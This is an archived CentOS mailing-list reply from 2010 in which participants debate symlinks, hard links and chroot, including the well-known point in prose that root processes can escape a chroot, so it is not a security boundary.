Re: /bin/su wont work inside a chroot?

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index] 

On Sun, 2010-08-01 at 17:41 -0700, Gordon Messmer wrote:
> On 08/01/2010 01:44 PM, JohnS wrote:
> > It *WILL* work It is called "Outside to In"&&  mount -o bind will also.
> 
> You previously described symlinking "out" to the root filesystem, which 
> is impossible.  Symlinks cannot resolve to files outside of a chroot 
> environment.  Hard links can.

lol

> It is, however, possible to create a symlink in the primary root 
> filesystem which points to a file inside a tree used for chroot, if that 
> is what you mean by "outside to in".  In that case, your previous post 
> was simply unclear.

Correct yes.

> > The difference depends on what is exactly the person needs.  IE (which
> > way).  It will also allow a "Jail Break" Out&  In.  So security goes out
> > the window.  In effect Zero Day here we are.
> 
> Symlinks do not allow you to break out of a chroot.  In fact, chroot 
> isn't a security mechanism.  chroot will confine any non-root process, 
> but any root process can escape a chroot simply by setting its cwd to 
> the root directory and then calling chroot() to any directory.  The 
> process will then have a cwd outside its own root filesystem, and can 
> access the filesystem outside of the path it was originally using as its 
> chroot.

Most people choose to refer to chroot as a secure means of running a
service which is simply not true.  It is known in the past that non root
services can jail break out and can break into the jailed root.  The
only good I have ever seen from chroot is building a OS from the ground
up.  It will only ever be as secure as the person configuring it.

> The term "zero day" normally describes a software exploit which was not 
> previously known.  I don't believe it applies to anything you described.

True and there are new ones every day don't be fooled.  What good is the
bind service running in a chroot when you get cache poisoned?  Your
patches up to date?  That may not even help.

John



_______________________________________________
CentOS mailing list
CentOS@xxxxxxxxxx
http://lists.centos.org/mailman/listinfo/centos
[Index of Archives]     [CentOS]     [CentOS Announce]     [CentOS Development]     [CentOS ARM Devel]     [CentOS Docs]     [CentOS Virtualization]     [Carrier Grade Linux]     [Linux Media]     [Asterisk]     [DCCP]     [Netdev]     [Xorg]     [Linux USB]
  Powered by Linux